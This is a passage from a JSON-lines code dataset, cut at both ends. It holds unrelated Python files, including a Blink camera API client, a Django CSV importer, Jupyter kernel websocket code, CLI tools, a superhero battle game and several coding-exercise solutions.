paychecks.append(paycheck)\n continue\n # If remainder CANNOT pay FULL salary\n # but CAN pay more than min_paycheck...\n elif remainder >= min_paycheck:\n if max_min == \"max\":\n paychecks.append(remainder)\n elif max_min == \"min\":\n paychecks.append(min_paycheck)\n # If remainder CANNOT pay more than min_paycheck\n # We're outta lambs, can't afford another paycheck.\n else:\n break\n \n return paychecks\n\n # Find MAX and MIN number of paychecks\n min_paychecks = calc_paychecks(total_lambs, \"min\")\n max_paychecks = calc_paychecks(total_lambs, \"max\")\n\n # Solution is min-cost-solution minus max-cost-solution!\n solution = len(min_paychecks) - len(max_paychecks)\n\n return solution\n \n","sub_path":"level2/lovely_lucky_lambs.py","file_name":"lovely_lucky_lambs.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"38660217","text":"import csv\nfrom datetime import date\nfrom django.core.management.base import BaseCommand\nfrom phones.models import Phone\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n with open('phones.csv', 'r') as csvfile:\n for line in csv.DictReader(csvfile, delimiter=';'):\n try:\n line['price'] = int(line['price'])\n line['release_date'] = date.fromisoformat(line['release_date'])\n line['lte_exists'] = line['lte_exists'] == 'True'\n except (ValueError, KeyError):\n continue\n if None in line:\n del(line[None])\n phone = Phone(**dict(line))\n phone.save()","sub_path":"work_with_database/phones/management/commands/import_phones.py","file_name":"import_phones.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273588142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nblinkpy is an unofficial api for the Blink security camera system.\n\nrepo url: https://github.com/fronzbot/blinkpy\n\nOriginal protocol hacking by MattTW :\nhttps://github.com/MattTW/BlinkMonitorProtocol\n\nPublished under the MIT license - See LICENSE file for more details.\n\"Blink Wire-Free HS Home Monitoring & Alert Systems\" is a trademark\nowned by Immedia Inc., see www.blinkforhome.com for more information.\nblinkpy is in no way affiliated with Blink, nor Immedia Inc.\n\"\"\"\n\nimport os.path\nimport time\nimport logging\nfrom shutil import copyfileobj\n\nfrom requests.structures import CaseInsensitiveDict\nfrom dateutil.parser import parse\nfrom slugify import slugify\n\nfrom blinkpy import api\nfrom blinkpy.sync_module import BlinkSyncModule\nfrom blinkpy.helpers.util import (\n create_session,\n merge_dicts,\n get_time,\n BlinkURLHandler,\n Throttle,\n)\nfrom blinkpy.helpers.constants import (\n BLINK_URL,\n DEFAULT_MOTION_INTERVAL,\n DEFAULT_REFRESH,\n MIN_THROTTLE_TIME,\n LOGIN_URLS,\n)\nfrom blinkpy.helpers.constants import __version__\nfrom blinkpy.login_handler import LoginHandler\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Blink:\n \"\"\"Class to initialize communication.\"\"\"\n\n def __init__(\n self,\n username=None,\n password=None,\n cred_file=None,\n refresh_rate=DEFAULT_REFRESH,\n motion_interval=DEFAULT_MOTION_INTERVAL,\n legacy_subdomain=False,\n no_prompt=False,\n persist_key=None,\n device_id=\"Blinkpy\",\n ):\n \"\"\"\n Initialize Blink system.\n\n :param username: Blink username (usually email address)\n :param password: Blink password\n :param cred_file: JSON formatted file to store credentials.\n If username and password are given, file\n is ignored. Otherwise, username and password\n are loaded from file.\n :param refresh_rate: Refresh rate of blink information.\n Defaults to 15 (seconds)\n :param motion_interval: How far back to register motion in minutes.\n Defaults to last refresh time.\n Useful for preventing motion_detected property\n from de-asserting too quickly.\n :param legacy_subdomain: Set to TRUE to use old 'rest.region'\n endpoints (only use if you are having\n api issues).\n :param no_prompt: Set to TRUE if using an implementation that needs to\n suppress command-line output.\n :param persist_key: Location of persistant identifier.\n :param device_id: Identifier for the application. Default is 'Blinkpy'.\n This is used when logging in and should be changed to\n fit the implementation (ie. \"Home Assistant\" in a\n Home Assistant integration).\n \"\"\"\n self.login_handler = LoginHandler(\n username=username,\n password=password,\n cred_file=cred_file,\n persist_key=persist_key,\n device_id=device_id,\n )\n self._token = None\n self._auth_header = None\n self._host = None\n self.account_id = None\n self.client_id = None\n self.network_ids = []\n self.urls = None\n self.sync = CaseInsensitiveDict({})\n self.region = None\n self.region_id = None\n self.last_refresh = None\n self.refresh_rate = refresh_rate\n self.session = create_session()\n self.networks = []\n self.cameras = CaseInsensitiveDict({})\n self.video_list = CaseInsensitiveDict({})\n self.login_url = LOGIN_URLS[0]\n self.login_urls = []\n self.motion_interval = motion_interval\n self.version = __version__\n self.legacy = legacy_subdomain\n self.no_prompt = no_prompt\n self.available = False\n self.key_required = False\n self.login_response = {}\n\n @property\n def auth_header(self):\n \"\"\"Return the authentication header.\"\"\"\n return self._auth_header\n\n def start(self):\n \"\"\"\n Perform full system setup.\n\n Method logs in and sets auth token, urls, and ids for future requests.\n Essentially this is just a wrapper function for ease of use.\n \"\"\"\n if not self.available:\n self.get_auth_token()\n\n if self.key_required and not self.no_prompt:\n email = self.login_handler.data[\"username\"]\n key = input(\"Enter code sent to {}: \".format(email))\n result = self.login_handler.send_auth_key(self, key)\n self.key_required = not result\n self.setup_post_verify()\n elif not self.key_required:\n self.setup_post_verify()\n\n def setup_post_verify(self):\n \"\"\"Initialize blink system after verification.\"\"\"\n camera_list = self.get_cameras()\n networks = self.get_ids()\n for network_name, network_id in networks.items():\n if network_id not in camera_list.keys():\n camera_list[network_id] = {}\n _LOGGER.warning(\"No cameras found for %s\", network_name)\n sync_module = BlinkSyncModule(\n self, network_name, network_id, camera_list[network_id]\n )\n sync_module.start()\n self.sync[network_name] = sync_module\n self.cameras = self.merge_cameras()\n self.available = self.refresh()\n self.key_required = False\n\n def login(self):\n \"\"\"Perform server login. DEPRECATED.\"\"\"\n _LOGGER.warning(\n \"Method is deprecated and will be removed in a future version. Please use the LoginHandler.login() method instead.\"\n )\n return self.login_handler.login(self)\n\n def get_auth_token(self, is_retry=False):\n \"\"\"Retrieve the authentication token from Blink.\"\"\"\n self.login_response = self.login_handler.login(self)\n if not self.login_response:\n self.available = False\n return False\n self.setup_params(self.login_response)\n if self.login_handler.check_key_required(self):\n self.key_required = True\n return self._auth_header\n\n def setup_params(self, response):\n \"\"\"Retrieve blink parameters from login response.\"\"\"\n self.login_url = self.login_handler.login_url\n ((self.region_id, self.region),) = response[\"region\"].items()\n self._host = \"{}.{}\".format(self.region_id, BLINK_URL)\n self._token = response[\"authtoken\"][\"authtoken\"]\n self._auth_header = {\"Host\": self._host, \"TOKEN_AUTH\": self._token}\n self.urls = BlinkURLHandler(self.region_id, legacy=self.legacy)\n self.networks = self.get_networks()\n self.client_id = response[\"client\"][\"id\"]\n self.account_id = response[\"account\"][\"id\"]\n\n def get_networks(self):\n \"\"\"Get network information.\"\"\"\n response = api.request_networks(self)\n try:\n return response[\"summary\"]\n except KeyError:\n return None\n\n def get_ids(self):\n \"\"\"Set the network ID and Account ID.\"\"\"\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict\n\n def get_cameras(self):\n \"\"\"Retrieve a camera list for each onboarded network.\"\"\"\n response = api.request_homescreen(self)\n try:\n all_cameras = {}\n for camera in response[\"cameras\"]:\n camera_network = str(camera[\"network_id\"])\n camera_name = camera[\"name\"]\n camera_id = camera[\"id\"]\n camera_info = {\"name\": camera_name, \"id\": camera_id}\n if camera_network not in all_cameras:\n all_cameras[camera_network] = []\n\n all_cameras[camera_network].append(camera_info)\n return all_cameras\n except KeyError:\n _LOGGER.error(\"Initialization failue. Could not retrieve cameras.\")\n return {}\n\n @Throttle(seconds=MIN_THROTTLE_TIME)\n def refresh(self, force_cache=False):\n \"\"\"\n Perform a system refresh.\n\n :param force_cache: Force an update of the camera cache\n \"\"\"\n if self.check_if_ok_to_update() or force_cache:\n for sync_name, sync_module in self.sync.items():\n _LOGGER.debug(\"Attempting refresh of sync %s\", sync_name)\n sync_module.refresh(force_cache=force_cache)\n if not force_cache:\n # Prevents rapid clearing of motion detect property\n self.last_refresh = int(time.time())\n return True\n return False\n\n def check_if_ok_to_update(self):\n \"\"\"Check if it is ok to perform an http request.\"\"\"\n current_time = int(time.time())\n last_refresh = self.last_refresh\n if last_refresh is None:\n last_refresh = 0\n if current_time >= (last_refresh + self.refresh_rate):\n return True\n return False\n\n def merge_cameras(self):\n \"\"\"Merge all sync camera dicts into one.\"\"\"\n combined = CaseInsensitiveDict({})\n for sync in self.sync:\n combined = merge_dicts(combined, self.sync[sync].cameras)\n return combined\n\n def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n \"\"\"\n Download all videos from server since specified time.\n\n :param path: Path to write files. /path/_.mp4\n :param since: Date and time to get videos from.\n Ex: \"2018/07/28 12:33:00\" to retrieve videos since\n July 28th 2018 at 12:33:00\n :param camera: Camera name to retrieve. Defaults to \"all\".\n Use a list for multiple cameras.\n :param stop: Page to stop on (~25 items per page. Default page 10).\n :param debug: Set to TRUE to prevent downloading of items.\n Instead of downloading, entries will be printed to log.\n \"\"\"\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)\n\n def _parse_downloaded_items(self, result, camera, path, debug):\n \"\"\"Parse downloaded videos.\"\"\"\n for item in result:\n try:\n created_at = item[\"created_at\"]\n camera_name = item[\"device_name\"]\n is_deleted = item[\"deleted\"]\n address = item[\"media\"]\n except KeyError:\n _LOGGER.info(\"Missing clip information, skipping...\")\n continue\n\n if camera_name not in camera and \"all\" not in camera:\n _LOGGER.debug(\"Skipping videos for %s.\", camera_name)\n continue\n\n if is_deleted:\n _LOGGER.debug(\"%s: %s is marked as deleted.\", camera_name, address)\n continue\n\n clip_address = \"{}{}\".format(self.urls.base_url, address)\n filename = \"{}-{}\".format(camera_name, created_at)\n filename = \"{}.mp4\".format(slugify(filename))\n filename = os.path.join(path, filename)\n\n if not debug:\n if os.path.isfile(filename):\n _LOGGER.info(\"%s already exists, skipping...\", filename)\n continue\n\n response = api.http_get(self, url=clip_address, stream=True, json=False)\n with open(filename, \"wb\") as vidfile:\n copyfileobj(response.raw, vidfile)\n\n _LOGGER.info(\"Downloaded video to %s\", filename)\n else:\n print(\n (\"Camera: {}, Timestamp: {}, \" \"Address: {}, Filename: {}\").format(\n camera_name, created_at, address, filename\n )\n )\n","sub_path":"blinkpy/blinkpy.py","file_name":"blinkpy.py","file_ext":"py","file_size_in_byte":13018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23277420","text":"def solution(n, lost, reserve):\n r_set = set(reserve)\n l_set = set(lost)\n real_r = r_set - l_set \n real_l = l_set - r_set\n helper= {}\n for e in real_r:\n helper[e] = list()\n if e-1 in real_l:\n helper[e].append(e-1)\n if e+1 in real_l:\n helper[e].append(e+1)\n\n h = sorted(helper.items())\n h = sorted(h, key = lambda x: len(x[1]))\n print(h)\n for e in h :\n if len(e[1]) == 1:\n if e[1][0] in real_l:\n real_l.remove(e[1][0])\n elif len(e[1]) == 2:\n if e[1][0] in real_l:\n real_l.remove(e[1][0])\n else :\n if e[1][1] in real_l:\n real_l.remove(e[1][1])\n \n return n - len(real_l)\n\n\ndef best_solution(n, lost, reserve):\n _reserve = [r for r in reserve if r not in lost]\n _lost = [l for l in lost if l not in reserve]\n for r in _reserve:\n f = r-1\n b = r+1\n if f in _lost :\n _lost.remove(f)\n elif b in _lost :\n _lost.remove(b)\n return n - len(_lost)\n\nn =5 \nlost = [2,4]\nreserve = [1,3,5]\n\nresult = solution(n, lost, reserve)\nprint(result)\n\n\n\n","sub_path":"greedy/workoutfit.py","file_name":"workoutfit.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"478982775","text":"__author__: 'Сакаев Александр Самигуллович'\n\n# task 1:\nfrom sys import argv\n\n\ndef salary(pay_rate, time_worked, bonus):\n wage = (pay_rate * time_worked) + bonus\n print(wage)\n\n\ntasks, a, b, c = argv\n\nsalary(float(a), float(b), float(c))\n\n# task 2:\na = list(map(int, input('Enter numbers: ').split()))\nresult = [numbers for i, numbers in enumerate(a) if i > 0 and a[i] > a[i - 1]]\nprint(result)\n\n# task 3:\nresult = [i for i in range(20, 240) if i % 20 == 0 or i % 21 == 0]\nprint(result)\n\n# task 4:\na = list(input('Enter numbers: ').split())\nresult = [i for i in a if a.count(i) == 1]\nprint(result)\n\n# task 5:\nfrom functools import reduce\n\n\ndef funk(a, b):\n return a * b\n\n\nresult = [i for i in range(99, 1001) if i % 2 == 0]\nprint(reduce(funk, result))\n\n# task 6:\nfrom itertools import count\n\nfor element in count(3):\n if element > 10:\n break\n else:\n print(element)\n\nfrom itertools import cycle\n\nl = ['a', 'b', 'c', 'd']\nx = 0\nfor i in cycle(l):\n x += 1\n if x > 10:\n break\n else:\n print(i)\n\n\n# task 7:\ndef fact(n):\n x = 1\n for i in range(1, n + 1):\n x *= i\n yield x\n\n\nn = int(input('Enter number: '))\nfor i in fact(n):\n print(i)\n","sub_path":"lesson_4/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325954130","text":"import numpy as np\n\nclass NaiveModel:\n def __init__ (self, threshold=0.5, regularization=False):\n self.threshold = threshold\n self.regularization = regularization\n \n def train (self, X, Y):\n Y1 = np.matrix (Y).transpose().tolist()\n y1_rows = len (Y1)\n y1_cols = len (Y1[0])\n self.output_size = y1_rows\n \n def predict (self, input):\n out = self.output_size * [0]\n for i in range (0, self.output_size):\n out[i] = input [len (input)- self.output_size+i]\n return out\n\n\n def test_model (self, input, output, verbose=True):\n total_l2_error = 0\n total_l1_error = 0\n predictions = []\n \n for i in range (len (output)):\n prediction = self.predict (input[i])\n predictions.append (prediction)\n err = self.l2_error (output[i], prediction)\n total_l2_error += err\n err = self.l1_error (output[i], prediction)\n total_l1_error += err\n if verbose:\n print (str (i+1)+ \") \")\n print (\"\\tActual\\t\\tPredicted\")\n for prod in range (0, len (output[i])):\n print (\"\\t\"+str(output [i][prod])+\"\\t\\t\"+str(prediction[prod]))\n #print (\"Actual: \" + str(output[i]))\n #print (\"Predicted: \"+ str(prediction))\n print (\"L2 Error: \" + str (err))\n print (\"Std Dev: \" + str ((err/len (output[i])) ** (0.5)))\n print (\"\")\n total_l2_error = total_l2_error / len (output)\n print (\"Average Error L2: \" + str (total_l2_error))\n \n rmsd = (total_l2_error / len (output[0]))**0.5\n print (\"RMSD: \" + str(rmsd))\n \n total_l1_error = total_l1_error / len (output)\n print (\"Average Error L1: \" + str (total_l2_error))\n \n average_deviation = (total_l1_error / len (output[0]))\n print (\"Average Deviation per Query: \" + str(average_deviation))\n \n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str (coeffs))\n \n cntng_table = self.contingency_table (output, predictions)\n print (cntng_table[0])\n \n def l1_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += abs(real[i] - prediction[i])\n return error\n\n def l2_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += (real[i] - prediction[i]) ** 2\n return error\n\n def mean (self, list):\n return sum (list) / len (list)\n \n def variance (self, list):\n mean = self.mean (list)\n variance = 0\n for value in list:\n variance += (value - mean) ** 2\n return variance / len(list)\n\n \"\"\"\n Returns a contingency table\n \"\"\"\n def contingency_table (self, real, prediction):\n table = []\n for i in range (0, len (real[0])):\n table.append ([0, 0, 0, 0])\n for b in range (0, len (real)):\n if (real[b][i] == 1):\n if (prediction [b][i] >= self.threshold):\n table[i][0] += 1 # True positive\n else:\n table[i][2] += 1 # False negative\n else:\n if (prediction[b][i] >= self.threshold):\n table[i][1] += 1 # False positive\n else:\n table[i][3] += 1 # True negative\n return table\n\n\n","sub_path":"forecaster/models/NaiveModel.py","file_name":"NaiveModel.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"61090532","text":"# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom jupyter_server.gateway.connections import GatewayWebSocketConnection\nfrom jupyter_server.gateway.managers import GatewayKernelManager\nfrom jupyter_server.services.kernels.connection.base import BaseKernelWebsocketConnection\nfrom jupyter_server.services.kernels.connection.channels import ZMQChannelsWebsocketConnection\n\nclass DelegatingWebsocketConnection(BaseKernelWebsocketConnection):\n \"\"\"Implementation of BaseKernelWebsocketConnection that delegates to another connection.\n\n If the parent KernelManager instance is for a remote kernel (i.e. it is a\n GatewayKernelManager), then the delegate is an instance of GatewayWebSocketConnection.\n\n Otherwise, it is an instance of ZMQChannelsWebsocketConnection.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n delegate_class = ZMQChannelsWebsocketConnection\n if self.kernel_manager.is_remote:\n delegate_class = GatewayWebSocketConnection\n self.delegate = delegate_class(\n parent=self.kernel_manager.delegate,\n websocket_handler=self.websocket_handler,\n config=self.config)\n\n async def connect(self):\n return await self.delegate.connect()\n\n async def disconnect(self):\n return await self.delegate.disconnect()\n\n def handle_incoming_message(self, msg):\n return self.delegate.handle_incoming_message(msg)\n\n def handle_outgoing_message(self, stream, msg):\n return self.delegate.handle_outgoing_message(stream, msg)\n\n # Prepare actually comes from ZMQChannelsWebsocketConnection.\n #\n # It is called by the jupyter_server kernels websocket handler if present, so\n # we provide an implemention of it in case the delegate is an instance of the\n # ZMQChannelWebsocketConnection class.\n async def prepare(self):\n if hasattr(self.delegate, \"prepare\"):\n return await self.delegate.prepare()\n","sub_path":"kernels-mixer/kernels_mixer/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"7712172","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/taurus/qt/qtgui/qwt5/cli.py\n# Compiled at: 2019-08-19 15:09:30\nimport click\nfrom .taurustrend import TaurusTrend\n\n@click.group('qwt5')\ndef qwt5():\n \"\"\"Qwt5 related commands\"\"\"\n pass\n\n\n@qwt5.command('plot')\n@click.argument('models', nargs=-1)\n@click.option('--config', 'config_file', type=click.File('rb'), help='configuration file for initialization')\n@click.option('-x', '--x-axis-mode', 'x_axis_mode', type=click.Choice(['t', 'n']), default='n', show_default=True, help='X axis mode. \"t\" implies using a Date axis' + '\"n\" uses the regular axis')\n@click.option('--demo', is_flag=True, help='show a demo of the widget')\n@click.option('--window-name', 'window_name', default='TaurusPlot (qwt5)', help='Name of the window')\ndef plot_cmd(models, config_file, x_axis_mode, demo, window_name):\n \"\"\"Shows a plot for the given models\"\"\"\n from .taurusplot import plot_main\n return plot_main(models=models, config_file=config_file, x_axis_mode=x_axis_mode, demo=demo, window_name=window_name)\n\n\n@qwt5.command('trend')\n@click.argument('models', nargs=-1)\n@click.option('-x', '--x-axis-mode', 'x_axis_mode', type=click.Choice(['t', 'n']), default='n', show_default=True, help='X axis mode. \"t\" implies using a Date axis' + '\"n\" uses the regular axis')\n@click.option('-a', '--use-archiving', 'use_archiving', is_flag=True, default=False, help='enable automatic archiving queries')\n@click.option('-b', '--buffer', 'max_buffer_size', type=int, default=TaurusTrend.DEFAULT_MAX_BUFFER_SIZE, show_default=True, help='maximum number of values per curve to be plotted')\n@click.option('-r', '--forced-read', 'forced_read_period', type=int, default=-1, metavar='MILLISECONDS', help='force re-reading of the attributes every MILLISECONDS ms')\n@click.option('--config', 'config_file', type=click.File('rb'), help='configuration file for initialization')\n@click.option('--demo', is_flag=True, help='show a demo of the widget')\n@click.option('--window-name', 'window_name', default='TaurusPlot (qwt5)', help='Name of the window')\ndef trend_cmd(models, x_axis_mode, use_archiving, max_buffer_size, forced_read_period, config_file, demo, window_name):\n \"\"\"Shows a trend for the given models\"\"\"\n from .taurustrend import trend_main\n return trend_main(models=models, config_file=config_file, x_axis_mode=x_axis_mode, use_archiving=use_archiving, max_buffer_size=max_buffer_size, forced_read_period=forced_read_period, demo=demo, window_name=window_name)\n\n\nif __name__ == '__main__':\n qwt5()","sub_path":"pycfiles/taurus-4.6.1-py2.7/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"312174897","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Handle storage API.\"\"\"\n\nimport click\nimport requests\n\nfrom renga.client import RengaClient\nfrom renga.client.storage import CreateBucket\n\nfrom ._config import config_path, with_config\nfrom ._options import option_endpoint\nfrom ._token import exchange_token, offline_token_using_password, \\\n with_access_token\n\n\n@click.group(name='io', invoke_without_command=True)\n@with_config\n@click.pass_context\ndef storage(ctx, config):\n \"\"\"Manage storage.\"\"\"\n if ctx.invoked_subcommand is None:\n click.echo('Try --help')\n\n\n@storage.command()\n@option_endpoint\n@with_config\ndef backends(config, endpoint):\n \"\"\"List all available storage backends.\"\"\"\n with with_access_token(config, endpoint) as access_token:\n client = RengaClient(endpoint=endpoint, access_token=access_token)\n for backend in client.storage.backends:\n click.echo(backend)\n\n\n@storage.group()\ndef bucket():\n \"\"\"Bucket manipulation.\"\"\"\n\n\n@bucket.command()\n@click.argument('name')\n@click.option('-b', '--backend', default='local')\n@option_endpoint\n@with_config\ndef create(config, name, backend, endpoint):\n \"\"\"Create new bucket.\"\"\"\n with with_access_token(config, endpoint) as access_token:\n client = RengaClient(endpoint=endpoint, access_token=access_token)\n bucket_id = client.storage.create_bucket(\n CreateBucket(name=name, backend=backend))\n\n config['project']['endpoints'].setdefault(endpoint, {})\n config['project']['endpoints'][endpoint].setdefault('buckets', {})\n config['project']['endpoints'][endpoint]['buckets'][bucket_id] = name\n\n # Set default bucket\n config['project']['endpoints'][endpoint].setdefault(\n 'default_bucket', bucket_id)\n\n click.echo(bucket_id)\n\n\n@bucket.command()\n@option_endpoint\n@with_config\ndef list(config, endpoint):\n \"\"\"List buckets.\"\"\"\n buckets = config['project']['endpoints'][endpoint].get('buckets', {})\n\n if buckets is None:\n raise click.ClickException('No registered buckets')\n\n for bucket_id, name in buckets.items():\n click.echo('{0}\\t{1}'.format(name, bucket_id))\n","sub_path":"renga/cli/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"187055239","text":"from SuperPoder import SuperPoder\r\nfrom Personagem import Personagem\r\nfrom SuperHeroi import SuperHeroi\r\nfrom Vilao import Vilao\r\nfrom Confronto import Confronto\r\n\r\n# ----------------------------------- criando superpoderes ----------------------------------------\r\n# Mario\r\nflorDeFogo = SuperPoder(\"Flor de fogo\", 3)\r\nplumaMagica = SuperPoder(\"Pluma Mágica\", 4)\r\nflorDeGelo = SuperPoder(\"Flor de gelo\", 3)\r\ncogumelo = SuperPoder(\"Cogumelo\", 2)\r\nestrela = SuperPoder(\"Estrela\", 5)\r\n\r\n# Homem Aranha\r\nsoltarTeia = SuperPoder(\"Soltar teia\", 3)\r\nandarEmParedes = SuperPoder(\"Andar em paredes\", 2)\r\nsentidoAranha = SuperPoder(\"Sentido aranha\", 1)\r\n\r\n# Super Homem\r\nvoar = SuperPoder(\"voar\", 3)\r\nforca = SuperPoder(\"forca\", 5)\r\nraioX = SuperPoder(\"raioX\", 4)\r\nsoproCongelante = SuperPoder(\"soproCongelante\", 4)\r\n\r\n#Capitão América\r\nsuperSoldado = SuperPoder(\"Super Soldado\", 3)\r\nescudo = SuperPoder(\"Escudo\", 5)\r\n\r\n# Flash\r\nvelocidade = SuperPoder(\"Velocidade\", 5)\r\n\r\n# Lanterna Verde\r\nanelMagico = SuperPoder(\"Anel Mágico\", 5)\r\n\r\n# Homem de Ferro\r\narmadura = SuperPoder(\"Armadura\", 4)\r\ndispositivosEletronicos = SuperPoder(\"Dispositivos eletrônicos\", 2)\r\n\r\n# Lex Luthor\r\nmenteAgucada = SuperPoder(\"Mente aguçada\", 5)\r\n\r\n# Octopus\r\ntentaculos = SuperPoder(\"Tentáculos indestrutíveis\", 5)\r\npocaVelocidade = SuperPoder(\"Velocidade\", 1)\r\n\r\n# ---------------------------- criando superHerois --------------------------------\r\n# Homem Aranha\r\nhomemAranha = SuperHeroi(\"Homem Aranha\", \"Peter Parker\")\r\nhomemAranha.adicionaSuperPoder(soltarTeia)\r\nhomemAranha.adicionaSuperPoder(andarEmParedes)\r\nhomemAranha.adicionaSuperPoder(sentidoAranha)\r\n\r\n# Super Homem\r\nsuperHomem = SuperHeroi(\"Super Homem\", \"Clark Kent\")\r\nsuperHomem.adicionaSuperPoder(voar)\r\nsuperHomem.adicionaSuperPoder(forca)\r\nsuperHomem.adicionaSuperPoder(raioX)\r\nsuperHomem.adicionaSuperPoder(soproCongelante)\r\n\r\n# Capitão América\r\ncapitaoAmerica = SuperHeroi(\"Capitão América\", \"Steven Rogers\")\r\ncapitaoAmerica.adicionaSuperPoder(superSoldado)\r\ncapitaoAmerica.adicionaSuperPoder(escudo)\r\n\r\n# Flash \r\nflash = SuperHeroi(\"Flash\", \"Barry Allen\")\r\nflash.adicionaSuperPoder(forca)\r\n\r\n# Lanterna Verde\r\nlanternaVerde = SuperHeroi(\"Lanterna Verde\", \"Hal Jordan\")\r\nlanternaVerde.adicionaSuperPoder(anelMagico)\r\n\r\n# Homem de Ferro\r\nhomemDeFerro = SuperHeroi(\"Homem de Ferro\", \"Tony Stark\")\r\nhomemDeFerro.adicionaSuperPoder(armadura)\r\nhomemDeFerro.adicionaSuperPoder(dispositivosEletronicos)\r\n\r\n# ----------------------------- criando vilões -----------------------------------\r\n# Duende Verde\r\nduendeVerde = Vilao(\"Duende Verde\", \"Norman Osbourne\", 15)\r\nduendeVerde.adicionaSuperPoder(forca)\r\n\r\n# Lex Luthor\r\nlexLuthor = Vilao(\"Lex Luthor\", \"Lex Luthor\", 10)\r\nlexLuthor.adicionaSuperPoder(menteAgucada)\r\n\r\n# Bizarro\r\nbizarro = Vilao(\"Bizarro\", \"Bizarro\", 20)\r\nbizarro.adicionaSuperPoder(voar)\r\nbizarro.adicionaSuperPoder(forca)\r\nbizarro.adicionaSuperPoder(raioX)\r\nbizarro.adicionaSuperPoder(soproCongelante)\r\n\r\n# Octopus\r\noctopus = Vilao(\"Octopus\", \"Otto Octavius\", 22)\r\noctopus.adicionaSuperPoder(tentaculos)\r\noctopus.adicionaSuperPoder(pocaVelocidade)\r\n\r\n# --------------------------------- testando -------------------------------------\r\n\r\n# cria lista de herois e vilões para exibi-los no console\r\nherois = [homemAranha, capitaoAmerica, superHomem, flash, lanternaVerde, homemDeFerro]\r\nviloes = [duendeVerde, lexLuthor, bizarro, octopus]\r\n\r\n# exibe os heróis da lista\r\ndef mostraHerois():\r\n\t\tprint (\"Heróis:\")\r\n\t\tfor heroi in herois:\r\n\t\t\t\tprint(heroi.getNome() + \", poder: \" + str(heroi.getPoderTotal()))\r\n\r\n# exibe os vilões da lista\r\ndef mostraViloes():\r\n\t\tprint (\"Vilões:\")\r\n\t\tfor vilao in viloes:\r\n\t\t\t\tprint(vilao.getNome() + \", poder: \" + str(vilao.getPoderTotal()) + \", Tempo de prisão: \" + str(vilao.getAnosDePrisao()) + \" anos.\")\r\n\r\n# iniciam-se os confrontos\r\nconfronto = Confronto()\r\nprint (confronto.executarConfronto(homemAranha, octopus))\r\nprint (confronto.executarConfronto(superHomem, bizarro))\r\nprint (confronto.executarConfronto(homemDeFerro, bizarro))\r\n","sub_path":"Jogo.py","file_name":"Jogo.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566581489","text":"# https://leetcode.com/problems/sum-of-root-to-leaf-binary-numbers/\n# ---------------------------------------------------\nclass TreeNode:\n def __init__(self, 